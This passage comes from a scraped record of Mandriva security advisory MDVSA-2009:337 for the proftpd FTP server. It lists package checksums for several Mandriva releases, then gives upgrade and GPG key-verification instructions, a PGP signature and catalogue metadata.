\r\n2010.0/x86_64/proftpd-mod_sql_postgres-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 669bf78b41fbb88407b577303e1882d3 \r\n2010.0/x86_64/proftpd-mod_time-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n e30a73829fc8be2bc42324abdcd39eef \r\n2010.0/x86_64/proftpd-mod_tls-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n a758dad6d4dd6b081d73606c92491cf5 \r\n2010.0/x86_64/proftpd-mod_vroot-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n ffe3b49a7437603bfe7306a2b768dd84 \r\n2010.0/x86_64/proftpd-mod_wrap-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n 08799784805658560301aa693f5ac870 \r\n2010.0/x86_64/proftpd-mod_wrap_file-1.3.2b-1.2mdv2010.0.x86_64.rpm\r\n b5c8299cfab2810dc0815bb075ce94d5 \r\n2010.0/x86_64/proftpd-mod_wrap_sql-1.3.2b-1.2mdv2010.0.x86_64.rpm \r\n 58436f06fb26948305063a45e78bcbd7 2010.0/SRPMS/proftpd-1.3.2b-1.2mdv2010.0.src.rpm\r\n\r\n Corporate 4.0:\r\n 9e3c2dad7e39f57a136edacdda8ba9cd corporate/4.0/i586/proftpd-1.3.2-0.4.20060mlcs4.i586.rpm\r\n 110df4bcd0dee71f075376bb19ef1097 \r\ncorporate/4.0/i586/proftpd-anonymous-1.3.2-0.4.20060mlcs4.i586.rpm \r\n b360f33279447f5893702533394169ae corporate/4.0/SRPMS/proftpd-1.3.2-0.4.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 0ad472dfac3bd614b0be3dcfeac2a1f1 \r\ncorporate/4.0/x86_64/proftpd-1.3.2-0.4.20060mlcs4.x86_64.rpm\r\n b254e9c733d69fc628e6bfc2b3c7f65c \r\ncorporate/4.0/x86_64/proftpd-anonymous-1.3.2-0.4.20060mlcs4.x86_64.rpm \r\n 
b360f33279447f5893702533394169ae corporate/4.0/SRPMS/proftpd-1.3.2-0.4.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 5b2e8c71ac240f80a4039fb3d00fa37e mes5/i586/proftpd-1.3.2-0.4mdvmes5.i586.rpm\r\n ef09730e96320171b4de114c4d72d359 mes5/i586/proftpd-devel-1.3.2-0.4mdvmes5.i586.rpm\r\n 998850de820e66e1d2fc65ca549e9f32 mes5/i586/proftpd-mod_autohost-1.3.2-0.4mdvmes5.i586.rpm\r\n 2bd18082feea9388ac5e8c67472976eb mes5/i586/proftpd-mod_ban-1.3.2-0.4mdvmes5.i586.rpm\r\n a2bde579998df96473ca81f807a9c9f8 mes5/i586/proftpd-mod_case-1.3.2-0.4mdvmes5.i586.rpm\r\n 76dd97730a1b1ba5309f90f34fbc03db \r\nmes5/i586/proftpd-mod_ctrls_admin-1.3.2-0.4mdvmes5.i586.rpm\r\n e2134d16144cd7547a0dc8971e1a3060 mes5/i586/proftpd-mod_gss-1.3.2-0.4mdvmes5.i586.rpm\r\n a5671b83d898fbf1dd0ce51de25bf12d mes5/i586/proftpd-mod_ifsession-1.3.2-0.4mdvmes5.i586.rpm\r\n 22c6dfc8dfca54756a45e2dee109baee mes5/i586/proftpd-mod_ldap-1.3.2-0.4mdvmes5.i586.rpm\r\n 89f4a985b0ebb8fba1edbf55978bf9fe mes5/i586/proftpd-mod_load-1.3.2-0.4mdvmes5.i586.rpm\r\n a777590d5a343fb3a740aed759213a1d mes5/i586/proftpd-mod_quotatab-1.3.2-0.4mdvmes5.i586.rpm\r\n cdd5769777d519e277372332255dfc34 \r\nmes5/i586/proftpd-mod_quotatab_file-1.3.2-0.4mdvmes5.i586.rpm\r\n 141f0e25185f09587b04189adfe479db \r\nmes5/i586/proftpd-mod_quotatab_ldap-1.3.2-0.4mdvmes5.i586.rpm\r\n e0c1b91d7620873739dca6b6a43e6cb2 \r\nmes5/i586/proftpd-mod_quotatab_radius-1.3.2-0.4mdvmes5.i586.rpm\r\n 6ce076f23e5c7945bb249df74d4f2c42 \r\nmes5/i586/proftpd-mod_quotatab_sql-1.3.2-0.4mdvmes5.i586.rpm\r\n 3d6d02f7b0fda8c5eca95e5e0ed247bf mes5/i586/proftpd-mod_radius-1.3.2-0.4mdvmes5.i586.rpm\r\n 5897cc00855488396715caf933c857fe mes5/i586/proftpd-mod_ratio-1.3.2-0.4mdvmes5.i586.rpm\r\n f7c174e7148559a4be61441b09e72ba0 mes5/i586/proftpd-mod_rewrite-1.3.2-0.4mdvmes5.i586.rpm\r\n da4438f1f256f135f24640ade3a8f405 mes5/i586/proftpd-mod_shaper-1.3.2-0.4mdvmes5.i586.rpm\r\n ee70e402b63828087410961276ee6951 
mes5/i586/proftpd-mod_site_misc-1.3.2-0.4mdvmes5.i586.rpm\r\n e2b5308857b74c730766ad5f1c7a2b2d mes5/i586/proftpd-mod_sql-1.3.2-0.4mdvmes5.i586.rpm\r\n d0d26f533cfdb59f012e3df0ff9f04b4 mes5/i586/proftpd-mod_sql_mysql-1.3.2-0.4mdvmes5.i586.rpm\r\n e0a76adf230b1146d44eb74f37326ccc \r\nmes5/i586/proftpd-mod_sql_postgres-1.3.2-0.4mdvmes5.i586.rpm\r\n f6286dfd897db61b472cf01ffeae9e23 mes5/i586/proftpd-mod_time-1.3.2-0.4mdvmes5.i586.rpm\r\n ef2583ddfcdb088f85248fc8e6b32740 mes5/i586/proftpd-mod_tls-1.3.2-0.4mdvmes5.i586.rpm\r\n 0476cf42ec380dc6689fc6df39766b17 mes5/i586/proftpd-mod_vroot-1.3.2-0.4mdvmes5.i586.rpm\r\n 9c681f81c7ff35bfaf0bcfb1c7982b45 mes5/i586/proftpd-mod_wrap-1.3.2-0.4mdvmes5.i586.rpm\r\n 47bba96722c5c17a34fe8329678b02cf mes5/i586/proftpd-mod_wrap_file-1.3.2-0.4mdvmes5.i586.rpm\r\n dadc6c23d5f0807db849ed92781ba94c mes5/i586/proftpd-mod_wrap_sql-1.3.2-0.4mdvmes5.i586.rpm \r\n 096a513d6a8b30b1a35e6fe1db6e502e mes5/SRPMS/proftpd-1.3.2-0.4mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n b120272b49c4e02b9108c0163dc9aa13 mes5/x86_64/proftpd-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 786d17db075a16940d7a1970bd3bb5e7 mes5/x86_64/proftpd-devel-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 3e453ed771a0b87e83a65e2d519f74b3 \r\nmes5/x86_64/proftpd-mod_autohost-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 028689776ee4070201f576cb5bc43817 mes5/x86_64/proftpd-mod_ban-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 18f8e72e3c153f363df5a3c801653196 mes5/x86_64/proftpd-mod_case-1.3.2-0.4mdvmes5.x86_64.rpm\r\n a85176fbdd6cdf97959d16c591bbdb4a \r\nmes5/x86_64/proftpd-mod_ctrls_admin-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 5fc16355fed589ee81f3a91edf971d34 mes5/x86_64/proftpd-mod_gss-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 84407e0d9a98d6fc1df92b0f0ebe707d \r\nmes5/x86_64/proftpd-mod_ifsession-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 158cb04b200c2d3c4695bf0f52cf1ac1 mes5/x86_64/proftpd-mod_ldap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n cf103f660b82e65c126522a062652104 mes5/x86_64/proftpd-mod_load-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 
7ec1019d08d8346a4cf610a3d323b234 \r\nmes5/x86_64/proftpd-mod_quotatab-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 6952dfbef25c19c4078d88562ddc5a5a \r\nmes5/x86_64/proftpd-mod_quotatab_file-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ddf6388392f885857649c959f53d5f57 \r\nmes5/x86_64/proftpd-mod_quotatab_ldap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 4c79e36c689ee1106e058a4267613c41 \r\nmes5/x86_64/proftpd-mod_quotatab_radius-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 0dc81114692e6556b75b7173bcc29b23 \r\nmes5/x86_64/proftpd-mod_quotatab_sql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 57309c9b341d3e0e33592c8f1972b964 mes5/x86_64/proftpd-mod_radius-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 9211a258846d7c26a0763ac14125669d mes5/x86_64/proftpd-mod_ratio-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 46a8bc1b19a11a94351293cd41c886ee \r\nmes5/x86_64/proftpd-mod_rewrite-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 1afddfeccf086fabc8985fb51562eb36 mes5/x86_64/proftpd-mod_shaper-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ba08b0aa1ecbe72fec308fc64f9601e4 \r\nmes5/x86_64/proftpd-mod_site_misc-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 7048d53a7b8d7a91d0364fc73206783c mes5/x86_64/proftpd-mod_sql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n ccfc7ff7a7dfd430bbb4f531bbd5f2d7 \r\nmes5/x86_64/proftpd-mod_sql_mysql-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 2c21fa4038914aa6127f1ca5a905b50d \r\nmes5/x86_64/proftpd-mod_sql_postgres-1.3.2-0.4mdvmes5.x86_64.rpm\r\n bf98fec5f6167f77fdc11431f0eadfde mes5/x86_64/proftpd-mod_time-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 503696b82de33085447527a0ece12b72 mes5/x86_64/proftpd-mod_tls-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 5910d34c9b33b82b889495148019b57f mes5/x86_64/proftpd-mod_vroot-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 189989e62986c53d1132bac4fcf5d55a mes5/x86_64/proftpd-mod_wrap-1.3.2-0.4mdvmes5.x86_64.rpm\r\n deb92c92045b7f39c06ab2537b36c35d \r\nmes5/x86_64/proftpd-mod_wrap_file-1.3.2-0.4mdvmes5.x86_64.rpm\r\n 512eeb68347e31174846d2825ae2069e \r\nmes5/x86_64/proftpd-mod_wrap_sql-1.3.2-0.4mdvmes5.x86_64.rpm \r\n 096a513d6a8b30b1a35e6fe1db6e502e mes5/SRPMS/proftpd-1.3.2-0.4mdvmes5.src.rpm\r\n 
_______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLMK6AmqjQ0CJFipgRAjj1AJ4gDdbY1CsNcLb5TXdAZYtMjk9EQACg5Mnd\r\nrRXKi0zMkqfD5bNJDudoE2w=\r\n=1SEX\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-12-22T00:00:00", "published": "2009-12-22T00:00:00", "id": "SECURITYVULNS:DOC:22982", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22982", "title": "[ MDVSA-2009:337 ] proftpd", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}